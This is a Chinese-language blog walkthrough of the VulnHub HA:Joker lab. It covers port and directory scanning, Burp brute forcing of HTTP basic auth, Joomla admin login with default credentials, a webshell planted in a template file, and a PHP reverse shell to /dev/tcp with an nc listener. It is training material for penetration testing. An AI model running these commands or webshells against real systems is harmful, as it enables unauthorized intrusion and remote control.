【渗透测试】——VulnHub靶机渗透实战 | HA:Joker

news2024/9/20 16:31:31

📖 前言:Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场。本文将从环境搭建、端口扫描、目录扫描到信息提取和突破8080端口,尽可能排除新版本遇到的环境Bug,详解介绍渗透测试全过程。如果你是新手小白,本文将带你一窥渗透测试的世界。


目录

  • 🕒 1. Kali环境与Joker靶场搭建
  • 🕒 2. 端口扫描
    • 🕘 2.1 nmap
    • 🕘 2.2 fscan
  • 🕒 3. 目录扫描
    • 🕘 3.1 dirsearch
    • 🕘 3.2 Dirb
  • 🕒 4. 信息提取
  • 🕒 5. 8080端口突破
    • 🕘 5.1 爆破账号密码
    • 🕘 5.2 入侵后台管理
    • 🕘 5.3 webshell
    • 🕘 5.4 反弹shell

🕒 1. Kali环境与Joker靶场搭建

🔎 Kali Linux环境部署

注:Kali应设置为桥接模式。

在这里插入图片描述

首先,开启命令行窗口输入ifconfig查看IP地址。
在这里插入图片描述

Kali 输入ifconfig后eth0只有ipv6地址的解决方案

在这里插入图片描述
1、在虚拟网络编辑器上选择桥接模式,桥接的网卡别选自动,选择自己的网卡,具体可以在网络和适配器中查看
在这里插入图片描述在这里插入图片描述
2、再次ifconfig,ipv4地址出现。

🔎 Joker靶场

解压后用VMware打开即可。

🕒 2. 端口扫描

🕘 2.1 nmap

nmap 192.168.31.*

对Kali所属的网段进行全网段扫描,其中*表示通配符0~255。观察开放端口,及对应的不同服务。
在这里插入图片描述
在这里插入图片描述

如果开放的端口有80端口,推测该主机很有可能是一个网站服务器,在浏览器中的地址栏中输入此地址192.168.31.182尝试进行访问。
在这里插入图片描述

进一步扫描该靶场开放的端口信息

nmap -T4 -sV -A 192.168.31.182

-T4 提高扫描速度,-sV 检测服务版本,-A 启用高级扫描选项如操作系统探测和脚本扫描。

在这里插入图片描述

依次访问端口查看开放了什么服务

192.168.31.182:8080	# HTTP

在这里插入图片描述

发现需要账号密码才能进行登录,接下来要想办法收集账号密码信息,先用root账户和弱密码试试。

192.168.31.182:22	# SSH

注:在XShell中尝试进行SSH连接
在这里插入图片描述

发现不行,我们后文再讨论其收集方法。

🕘 2.2 fscan

fscan一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

🔎 fscan下载链接

注意杀毒软件设置信任

在这里插入图片描述

fscan.exe -h 192.168.31.0/24

在这里插入图片描述

🕒 3. 目录扫描

🕘 3.1 dirsearch

在安全测试时,进行信息收集时可使用dirsearch进行目录枚举。将爬取到的url进行状态码识别,如果是403状态则进行保存,尝试绕过403以找到隐藏文件,并获取管理员权限。

🔎 dirsearch下载链接

下载完成后,直接在路径处输入cmd快速在当前目录下打开
在这里插入图片描述
随后批量安装依赖库,在CMD窗口中执行:

pip install -r requirements.txt		# 安装依赖库

安装完成依赖库,即可开始批量扫描:

python dirsearch.py -u http://192.168.31.182

在这里插入图片描述

HTTP 状态码科普

  • 2xx 存在且可访问
  • 3xx 存在但是给你重定向到另外的网站了
  • 403 可能存在,但是不允许你访问
  • 404 不存在
  • 405 请求方式不被允许
  • 500 服务器错误,通常是指服务器不能使用或者故障

🔎 HTTP 状态码 - 菜鸟教程

重点看图中标绿色的两个文件 phpinfo.php 和 secret.txt

在这里插入图片描述

在这里插入图片描述
其中phpinfo里面都是一些配置信息,价值不大。secret文件可以看到一段信息。

🕘 3.2 Dirb

在Kali中,我们同样可以使用web网站目录爆破工具Dirb进行目录扫描

在扫描过程中,选取详细强大的字典尤为重要。这里我们直接选取dirsearch的字典。

dirb http://192.168.31.182 dicc.txt -w

在这里插入图片描述

可以看到dirb扫描较慢,是由于单线程的缘故,实战中常使用前述采用多线程的dirsearch。

在这里插入图片描述

🕒 4. 信息提取

FindSomething是一款轻量级的浏览器插件,帮助用户快速查找网页源代码和JavaScript中的隐藏信息,如API请求、IP地址、敏感数据泄露等,便于开发者和安全人员进行分析。

我们可以在Chrome(需科学上网)或Firefox的扩展商店下载安装。
在这里插入图片描述
打开网页,右上角点击插件FindSomething,我们就可以看到站点的相关信息了。

在这里插入图片描述

🕒 5. 8080端口突破

🕘 5.1 爆破账号密码

书接上回,我们需要通过Brup Suite抓包分析

🔎 Brup Suite平台安装

在这里插入图片描述
通过尝试弱口令登录并代理发现,其请求包中发送的账号密码是隐藏的,隐藏在Authentication字段中。很明显我们猜测是某种加密或编码,我们放到编码工具尝试解码一下。

在这里插入图片描述
挨个尝试一下,发现是Base64编码的,这里也看到了我们尝试登陆的账号与弱口令。

接下来我们对其payload进行处理,观察格式为账号:密码,发送到Intruder中

在Payload的标签页中下划到Payload处理 → 添加 → 添加前缀 → admin:

添加 → 编码 → Base64编码

在这里插入图片描述

开始攻击

在这里插入图片描述

观察结果,发现长度没区别,换言之并没有解开密码。会不会是字典不全面?

还记得前面我们目录扫描到的secret.txt吗,其实里面有些提示。

在这里插入图片描述
其实指的是rockyou这个字典
在这里插入图片描述
我们更改字典尝试一下

在这里插入图片描述
似乎没什么变化,是不是我们账号错了?结合secret.txt的提示,是去击败joker。我们猜测一下用户名是joker。

在这里插入图片描述

在这里插入图片描述

我们惊喜的发现,获取到正确的密码,并且成功登录了。
在这里插入图片描述
接下来我们尝试获取网站后台管理最高权限。

在这里插入图片描述
Joomla框架的网页在登录的时候会有一个超级管理员的默认账号密码是joomla/joomla,尝试使用弱口令进行登录,用同样的方式进行后台登录。

在这里插入图片描述
在这里插入图片描述

🕘 5.2 入侵后台管理

以上页面搜寻一圈,发现没有什么可以攻击的地方,对于一个网站而言,应该是会有个后台管理页面,会在哪里呢?

请出dirsearch软件

python dirsearch.py --auth-type=basic --auth=joker:hannah -u http://192.168.31.182:8080/

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

账号密码就是前面我们推测的超级管理员的 joomla/joomla

在这里插入图片描述

🕘 5.3 webshell

shell是渗透中常用的名词,如getshell,webshell,反弹shell等等,都和shell相关。

  • getshell:获取到目标的命令执行权限
  • webshell:指网站后门,通过web服务进行命令执行
  • 反弹shell:把命令行的输入输出转移到其它主机

逐一点开各功能搜寻是否有上传文件的位置

在这里插入图片描述
Extension:插件扩展,大多数漏洞都源自于此

点进去后发现是个主题,随便进入一个

在这里插入图片描述
我们惊喜的发现我们可以随意编辑与新增文件!试试一句话木马

在这里插入图片描述

成功保存!接下来需要尝试寻找该文件所在的URL,先采取猜测拼接的方法。
以上图为例,我们是将文件保存在beez3/language这个目录下,我们尝试将其拼接进URL

http://192.168.31.182:8080/templates/beez3/language/test.php

注意这个templates不是一下子就想出来的哦,比如会猜测是template/Templates/templates 这些,一个个尝试联想排除。

在这里插入图片描述
我们将代码改成webshell的,随后使用中国蚁剑控制,第一次用该软件的友友可以参考下面的文章过一遍

🔎 【DVWA】——File Upload(文件上传)

在这里插入图片描述

发现不成功,为什么呢?这里其实涉及basic认证的问题,使用BP抓包可以发现

在这里插入图片描述

将认证信息复制进配置里,即可连接成功

在这里插入图片描述

在这里插入图片描述

🕘 5.4 反弹shell

什么是反弹shell:简单理解就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

为什么要反弹shell:被控端会出现防火墙受限、权限不足、端口被占用等情形。

在本次实验中,我们让joker连接至kali。现实情况下,我们会采取购置一个公网IP的方式使受害者主机连接,而不是连接到攻击者主机的虚拟机kali。

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.31.232/7777 0>&1'");?>

这个 PHP 代码段执行了一条命令,该命令通过 Bash 创建了一个反向 shell 连接:

  • PHP exec 函数: exec 是 PHP 的一个函数,用于执行系统命令,并且可以获取命令的输出。
  • /bin/bash -c: 这是告诉 Bash 执行后面指定的命令字符串。-c 选项表示要执行的命令是在引号中指定的字符串。
  • bash -i: 启动一个交互式的 Bash shell。
  • >& /dev/tcp/192.168.31.232/7777: 将标准输出和标准错误输出重定向到 /dev/tcp/192.168.31.232/7777。这是一个特殊的设备文件,它允许 Bash 通过 TCP 协议连接到指定的 IP 地址和端口。
  • 0>&1: 将标准输入重定向到标准输出(已经重定向到 TCP 连接的设备)。

将上述代码写入前面创建的test.php中,并在kali中开启监听

nc -lvnp 7777
  • nc:调用 netcat,一个用于网络连接的工具,可以作为服务器端或客户端使用,通常用于调试、创建反向Shell等。
  • -l:表示监听模式,即等待来自外部的连接,充当一个服务器。
  • -v:启用详细模式,显示更多连接过程中的详细信息。
  • -n:忽略DNS解析,直接使用IP地址(加快连接速度)。
  • -p 7777:指定监听的端口号,这里是 7777 端口。

刷新一下test.php所在的URL

在这里插入图片描述

在这里插入图片描述
可以看到kali此刻已经拿下命令行权限。


OK,以上就是本期知识点“Joker靶场实战”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2149411.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Cesium Shader 广告牌纹理动画

Cesium Shader 广告牌纹理动画 Cesium 在广告牌, 自定义shader实现播放spritesheet. 图片资源: https://www.codeandweb.com/free-sprite-sheet-packer Cesium Shader 广告牌纹理动画

MySQL高阶1843-可疑银行账户

目录 题目 准备数据 ​分析数据 实现 总结 题目 如果一个账户在 连续两个及以上 月份的 总收入 超过最大收入&#xff08;max_income&#xff09;&#xff0c;那么认为这个账户 可疑。 账户当月 总收入 是当月存入资金总数&#xff08;即 transactions 表中 type 字段的…

Vivado FIR IP 详解 (一)

FIR滤波器是数字信号处理中常用的滤波器&#xff0c;除了通过Verilog代码自己实现外&#xff0c;Vivado提供了一个FIR滤波器 IP&#xff0c;可以直接调用。 一、什么是 Vivado FIR IP 核 FIR&#xff08;Finite Impulse Response&#xff09;滤波器即有限长单位冲激响应滤波器…

兔子检测系统源码分享

兔子检测检测系统源码分享 [一条龙教学YOLOV8标注好的数据集一键训练_70全套改进创新点发刊_Web前端展示] 1.研究背景与意义 项目参考AAAI Association for the Advancement of Artificial Intelligence 项目来源AACV Association for the Advancement of Computer Vision …

安卓13设置动态显示隐藏第一页的某一项 动态显示隐藏无障碍 android13设置动态显示隐藏第一页的某一项

总纲 android13 rom 开发总纲说明 文章目录 1.前言2.问题分析3.代码分析4.代码修改4.1修改方法14.2修改方法25.编译6.彩蛋1.前言 有时候,我们的设置里面显示的信息,需要根据不同的情况显示不同的信息,例如,动态的显示或者隐藏 “无障碍” 这一项。 2.问题分析 像这个问题…

【经验帖】脏读和不可重复读的概念及影响

脏读和不可重复读是数据库事务并发执行时可能出现的两种数据一致性问题&#xff0c;它们对数据的一致性和完整性有着显著的影响。以下是脏读和不可重复读的具体影响&#xff1a; 脏读的影响 脏读发生在一个事务读取了另一个事务未提交的数据时。由于这些数据尚未被提交&#x…

python机器人编程——用手机web远程视频监控并控制小车驾驶(上篇vrep仿真)

目录 一、前言二、技术架构三、设备端实现四、服务控制端实现&#xff08;1&#xff09;摄像头服务模块&#xff08;2&#xff09;web服务器 五、web端实现&#xff08;1&#xff09;视频显示&#xff08;2&#xff09;驾驶盘的实现&#xff08;3&#xff09;心跳 六、总结七、…

大厂里为什么都在运用精益六西格玛管理?

近年来&#xff0c;大型企业&#xff08;简称“大厂”&#xff09;为了保持其市场领先地位和持续盈利能力&#xff0c;不断探索并引入先进的管理理念和方法。其中&#xff0c;精益六西格玛管理作为一种综合性的质量管理和流程优化工具&#xff0c;正被越来越多的企业所采用。本…

YOLOv8改进系列,YOLOv8 Neck结构引入BiFPN

摘要 模型效率在计算机视觉中变得越来越重要。本文系统地研究了神经网络架构设计选择用于目标检测,并提出了几项关键优化以提高效率。首先,提出了一种加权双向特征金字塔网络(BiFPN),它允许轻松快速的多尺度特征融合;其次,我们提出了一种复合缩放方法,该方法同时均匀地…

操作系统 --- 进程的同步和互斥问题以及进程互斥实现方法(软件、硬件实现)、同步机制遵循的四条准则

目录 一、进程同步 二、进程互斥 三、进程互斥的实现方法 3.1 软件实现 3.1.1 单标志法&#xff08;存在的主要问题&#xff1a;违背“空闲让进”原则&#xff09; 3.1.1.1 基本思想 3.1.1.2 单标志法的基本概念及执行流程 3.1.1.3 特点 3.1.2 双标志先检查法&#…

【Linux 】开发利器:深度探索 Vim 编辑器的无限可能

&#x1f525; 个人主页&#xff1a;大耳朵土土垚 &#x1f525; 所属专栏&#xff1a;Linux系统编程 这里将会不定期更新有关Linux的内容&#xff0c;欢迎大家点赞&#xff0c;收藏&#xff0c;评论&#x1f973;&#x1f973;&#x1f389;&#x1f389;&#x1f389; 文章目…

NC65使用UAP客开主子单据以及NC65常见的开发技术(超级详细附带图和源码)

NC65使用UAP客开主子单据以及NC65单据相关的开发技术&#xff08;超级详细附带图和源码&#xff09; 本篇主要讲述使用UAP开发工具客开主子单据包括&#xff1a;创建项目发布、创建发布元数据、生成主子单据、以及相关报错和打补丁。在单据相关技术主要包括&#xff1a;增加空按…

物流管理系统小程序的设计

管理员账户功能包括&#xff1a;系统首页&#xff0c;个人中心&#xff0c;用户管理&#xff0c;员工管理&#xff0c;部门管理&#xff0c;物品分类管理&#xff0c;物流公司管理&#xff0c;物流信息管理&#xff0c;配送信息管理 微信端账号功能包括&#xff1a;系统首页&a…

半导体器件制造5G智能工厂数字孪生物联平台,推进制造业数字化转型

半导体器件制造行业作为高科技领域的核心驱动力&#xff0c;正积极探索和实践以5G智能工厂数字孪生平台为核心的新型制造模式。这一创新不仅极大地提升了生产效率与质量&#xff0c;更为制造业的未来发展绘制了一幅智能化、网络化的宏伟蓝图。 在半导体器件制造5G智能工厂中&a…

python 山峦图

效果&#xff1a; 代码&#xff1a; import matplotlib.pyplot as plt import numpy as npdef mountain_plot(data_dict, colorsNone):if colors is None:colors get_colors_from_map(len(data_dict), "Spectral")x list(data_dict.keys())# Y轴位置y_positions …

某锂电厂房项目密集母线槽上红外测温的案例分享

1 行业背景 在政策和技术推动下&#xff0c;锂电产业迅速发展&#xff0c;产业规模持续扩大&#xff0c;同时对供电设备的可靠性要求提高。密集型母线槽作为厂房重要电力传输设备若出现触头温升过高&#xff0c;可能导致停电甚至烧毁等故障&#xff0c;会对生产线安全和企业效…

Java反序列化漏洞分析

相关学习资料# http://www.freebuf.com/vuls/90840.htmlhttps://security.tencent.com/index.php/blog/msg/97http://www.tuicool.com/articles/ZvMbInehttp://www.freebuf.com/vuls/86566.htmlhttp://sec.chinabyte.com/435/13618435.shtmlhttp://www.myhack58.com/Article/ht…

【Qt笔记】QTabWidget控件详解

目录 引言 一、基本功能 二、核心属性 2.1 标签页管理 2.2 标签位置 2.3 标签形状 2.4 标签可关闭性 2.5 标签可移动性 三、信号与槽 四、高级功能 4.1 动态添加和删除标签页 4.2 自定义标签页的关闭按钮行为 4.3 标签页的上下文菜单 五、样式设置 六、应用示例…

git使用“保姆级”教程1——简介及配置项设置

一、git介绍 Git是一个开源的分布式版本控制系统&#xff0c;用于&#xff1a;敏捷高效地处理任何或小或大的项目。Git 是Linus Torvalds 为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件。版本控制&#xff1a; 版本控制&#xff08;Revision control&#xff…

鸿蒙环境服务端签名直传文件到OSS

本文介绍如何在鸿蒙环境下将文件上传到OSS。 背景信息 鸿蒙环境是当下比较流行的操作环境&#xff0c;与服务端签名直传的原理类似&#xff0c;鸿蒙环境上传文件到OSS是利用OSS提供的PutObject接口来实现文件上传到OSS。关于PutObject的详细介绍&#xff0c;请参见PutObject。…